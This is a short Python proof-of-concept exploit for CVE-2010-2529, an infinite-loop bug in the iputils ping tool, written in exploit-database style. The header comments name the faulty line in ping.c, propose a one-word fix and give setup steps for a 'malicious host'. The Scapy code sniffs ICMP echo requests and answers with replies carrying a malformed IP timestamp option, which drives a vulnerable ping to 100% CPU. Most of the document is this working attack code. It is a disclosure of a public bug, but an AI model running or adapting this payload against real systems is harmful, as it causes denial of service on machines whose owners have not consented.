#!/usr/bin/env python
#
# Exploit Title: Ping infinite loop
# Date: July 25, 2010
# Author: Anonymous
# Software Link: http://www.skbuff.net/iputils/
# Version: iputils-s20100418
# Tested on: 2.6.26-2-amd64 Debian lenny, 2.6.32-5-amd64 Debian sid, 2.6.32 Arch Linux, 2.6.30-9 Ubuntu 8.10
#            2.6.28-17 Ubuntu 9.04, 2.6.31-14 Ubuntu 9.10, 2.6.32-23 Ubuntu 10.04
# CVE: CVE-2010-2529
# References: MDVSA-2010:138, http://seclists.org/fulldisclosure/2010/Jul/336
# Patch Instructions: none
# Requires: Scapy http://www.secdev.org/projects/scapy/
#
# Infinite loop in ping.c, pr_options(), case IPOPT_TS, line 1071-1072: if (i <= 0) continue;
# Proposed fix: replace continue with break
#
# On the malicious host (IP A.B.C.D), as root:
#   # echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
#   # python ping-infinite-loop.py A.B.C.D
#
# From a vulnerable system:
#   $ ping A.B.C.D
#   PING A.B.C.D (A.B.C.D) 56(84) bytes of data.
#   [goes in infinite loop and consumes 100% CPU]
#
# Stop it with 'killall ping' from another shell (or ^Z/fg).
#
from sys import argv,exit
from scapy.all import *

def reply(s):
  p = IP(src=s[IP].dst, dst=s[IP].src)/ICMP(type=0, id=s[ICMP].id, seq=s[ICMP].seq)/(s[Raw] if s.haslayer(Raw) else '')
  p[IP].options = [IPOption(optclass='debug',option='timestamp',value='\x05\x04ABCD')]
  send(p,verbose=False)
  print "Sent ping 'infinite loop' reply to", p[IP].dst

if __name__=='__main__':
  if len(argv)<2:
    print "Usage: %s <IP dst to match>" % argv[0]
    exit(1)

  sniff(lfilter = lambda p: p.haslayer(ICMP) and p[ICMP].type==8 and p[IP].dst==argv[1], prn=reply)